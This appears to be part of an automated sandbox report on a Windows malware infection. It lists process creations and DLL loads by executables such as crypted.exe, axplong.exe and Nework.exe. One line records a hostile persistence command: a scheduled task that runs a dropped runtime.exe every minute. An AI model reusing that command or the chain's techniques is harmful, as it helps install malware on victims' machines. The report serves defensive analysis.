Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe	Process created: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe "C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /Create /SC MINUTE /MO 1 /TN "runtime" /TR "C:\Users\user\Pictures\Lighter Tech\runtime.exe" /F
Source: C:\Users\user\1000238002\Amadeus.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000284001\crypted.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process created: unknown unknown
Source: C:\Users\user\Pictures\Lighter Tech\runtime.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000002001\crypted.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: esdsip.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000004001\crypteda.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: propsys.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: edputil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: appresolver.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: slc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sppc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\CZjRdKVnFB.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\rHCHrI9F0v.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mstask.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: dui70.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: duser.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: chartv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: atlthunk.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000005001\Nework.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe	Section loaded: sspicli.dll
